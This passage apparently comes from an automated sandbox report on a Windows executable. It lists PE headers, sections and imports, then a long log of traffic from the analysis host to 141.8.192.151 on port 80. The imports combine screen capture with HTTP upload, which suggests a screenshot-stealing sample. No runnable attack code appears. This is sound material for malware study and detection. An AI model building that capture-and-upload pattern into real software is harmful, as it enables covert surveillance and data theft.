lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [004A2014h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa06dc	0x8c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xa8400	0x23a8	.reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa7000	0x680c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x992f8	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x99400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x99330	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x87000	0x28c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x854ec	0x85600	False	0.5623700357310215	data	6.724381241477367	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x87000	0x1a596	0x1a600	False	0.4773863299763033	data	5.592124453306788	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa2000	0x42d4	0x1a00	False	0.1736778846153846	DOS executable (block device driver \200\377\377\377\377\261,32-bit sector-support)	3.945907427530122	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0xa7000	0x680c	0x6a00	False	0.6731647995283019	data	6.626873203758056	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	EnterCriticalSection, GetCurrentProcess, WriteFile, LeaveCriticalSection, SetFilePointer, InitializeCriticalSectionEx, UnmapViewOfFile, GetModuleHandleA, HeapSize, MultiByteToWideChar, GetFileInformationByHandle, CopyFileA, GetLastError, CreateFileA, FileTimeToSystemTime, LoadLibraryA, LockResource, HeapReAlloc, CloseHandle, RaiseException, FindResourceExW, LoadResource, FindResourceW, HeapAlloc, GetLocalTime, DecodePointer, HeapDestroy, GetProcAddress, CreateFileMappingA, GetFileSize, DeleteCriticalSection, GetProcessHeap, SystemTimeToFileTime, FreeLibrary, HeapFree, MapViewOfFile, GetTickCount, IsWow64Process, AreFileApisANSI, GetFullPathNameW, LockFile, InitializeCriticalSection, GetFullPathNameA, SetEndOfFile, GetTempPathW, CreateFileW, GetFileAttributesW, GetCurrentThreadId, Sleep, GetTempPathA, GetFileAttributesA, GetVersionExA, DeleteFileA, DeleteFileW, LoadLibraryW, UnlockFile, LockFileEx, GetCurrentProcessId, GetSystemTimeAsFileTime, GetSystemTime, FormatMessageA, QueryPerformanceCounter, FlushFileBuffers, SetStdHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, SizeofResource, GetModuleFileNameA, WideCharToMultiByte, ReadFile, ReadConsoleW, GetTimeZoneInformation, GetFileType, GetFileSizeEx, GetConsoleMode, GetConsoleCP, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, WriteConsoleW, GetCommandLineW, GetCommandLineA, GetStdHandle, GetModuleFileNameW, QueryPerformanceFrequency, GetModuleHandleExW, ExitProcess, VirtualQuery, VirtualProtect, VirtualAlloc, GetSystemInfo, GetCurrentDirectoryW, CreateDirectoryW, FindClose, FindFirstFileExW, FindNextFileW, GetFileAttributesExW, RemoveDirectoryW, SetFilePointerEx, SetLastError, GetModuleHandleW, CopyFileW, LocalFree, GetStringTypeW, EncodePointer, InitializeCriticalSectionAndSpinCount, CreateEventW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsDebuggerPresent, OutputDebugStringW, SetEvent, ResetEvent, WaitForSingleObjectEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, InitializeSListHead, TerminateProcess, RtlUnwind, LoadLibraryExW
USER32.dll	GetDC, GetSystemMetrics, ReleaseDC, GetDesktopWindow
GDI32.dll	DeleteObject, GetObjectA
SHLWAPI.dll	PathFindExtensionW, PathFindExtensionA
gdiplus.dll	GdipSaveImageToFile, GdipCreateBitmapFromScan0, GdipGetImageEncodersSize, GdipDisposeImage, GdipGetImageEncoders, GdiplusShutdown, GdipCreateBitmapFromHBITMAP, GdiplusStartup
WININET.dll	InternetWriteFile, HttpEndRequestA, HttpSendRequestExA, InternetOpenA, HttpOpenRequestA, InternetConnectA, InternetCloseHandle

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 4, 2023 11:17:55.902425051 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:56.072740078 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.072932959 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:56.079627991 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:56.079782009 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:56.094963074 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:56.249490976 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.249521017 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.249603033 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:56.264888048 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.265000105 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:56.419353008 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.424361944 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:56.434746981 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.434777975 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.434906960 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:56.594331980 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.594361067 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.594460011 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:56.604712009 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.604742050 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.604887009 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:56.764575005 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.764589071 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.764790058 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:56.774861097 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.774913073 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.774954081 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.774988890 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.775048971 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:56.775150061 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:56.775150061 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:56.934864998 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.934967041 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.935003042 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.935038090 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.935070038 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.935084105 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:56.935084105 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:56.935203075 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:56.935204029 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:56.945063114 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.945122004 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.945209980 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.945349932 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.945385933 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.945411921 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:56.945460081 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.945496082 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.945539951 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:56.945539951 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:56.945605993 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:56.945605993 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:56.945605993 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:56.945637941 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:56.945755005 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.105052948 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.105093002 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.105114937 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.105134964 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.105282068 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.105304003 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.105305910 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.105305910 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.105325937 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.105400085 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.105400085 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.105418921 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.105496883 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.105588913 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.105592966 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.105614901 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.105659962 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.105683088 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.115295887 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.115331888 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.115484953 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.115525007 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.115600109 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.115648031 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.115668058 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.115714073 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.115736961 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.115833998 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.115950108 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.116012096 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.116090059 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.116194010 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.116214037 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.116286039 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.116286039 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.116384029 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.116405010 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.116465092 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.116465092 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.116488934 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.116511106 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.116534948 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.116554976 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.116579056 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.116602898 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.116631031 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.116662979 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.116739988 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.156888008 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.157087088 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.275298119 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.275336027 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.275500059 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.275553942 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.275676012 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.275723934 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.275748014 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.275768042 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.275784016 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.275789022 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.275809050 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.275810957 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.275809050 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.275832891 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.275852919 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.275855064 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.275852919 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.275882006 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.275882006 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.275919914 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.275948048 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.276014090 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.276133060 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.276161909 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.276186943 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.276222944 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.285305977 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.285346985 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.285370111 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.285392046 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.285428047 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.285459995 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.285459995 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.285535097 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.285535097 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.285638094 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.285662889 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.285717010 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.285732985 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.285762072 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.285782099 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.285828114 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.285828114 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.285990000 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.286009073 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.286036968 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.286060095 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.286112070 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.286173105 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.286247015 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.286298990 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.286305904 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.286349058 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.286444902 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.286513090 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.286535025 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.286590099 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.286602020 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.286631107 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.286680937 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.286736965 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.286740065 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.286761045 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.286782026 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.286782980 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.286803007 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.286803007 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.286824942 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.286860943 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.287256956 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.287281990 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.287302971 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.287306070 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.287323952 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.287341118 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.287373066 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.287391901 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.327167988 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.327452898 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.445487022 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.445596933 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.445683956 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.445713997 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.445765018 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.445812941 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.445935011 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.446044922 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.446116924 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.446223974 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.446300983 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.446387053 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.446393013 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.446464062 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.446506977 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.446599960 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.446621895 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.446695089 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.446753979 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.446860075 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.447001934 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.447061062 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.447077990 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.447083950 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.447101116 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.447141886 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.447160006 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.447238922 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.447326899 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.447436094 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.447527885 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.455333948 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.455370903 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.455435038 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.455457926 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.455508947 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.455581903 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.455581903 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.455667019 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.455748081 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.455822945 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.455846071 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.455899000 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.455925941 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.455938101 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.455997944 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.456002951 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.456072092 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.456161976 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.456228971 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.456305981 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.456370115 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.456549883 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.456573963 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.456621885 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.456649065 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.456688881 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.456768036 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.456912994 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.456933975 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.456953049 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.456970930 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.456971884 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.456989050 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.456990957 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.457012892 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.457012892 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.457032919 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.457056999 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.457324982 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.457349062 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.457416058 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.457448006 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.457504988 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.457597017 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.457604885 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.457669020 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.457710028 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.457784891 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.457916975 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.457998037 CEST	49185	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:17:57.458163023 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.458184958 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.458205938 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.458228111 CEST	80	49185	141.8.192.151	192.168.2.22
Jul 4, 2023 11:17:57.458249092 CEST	80	49185	141.8.192.151	192.168.2.22
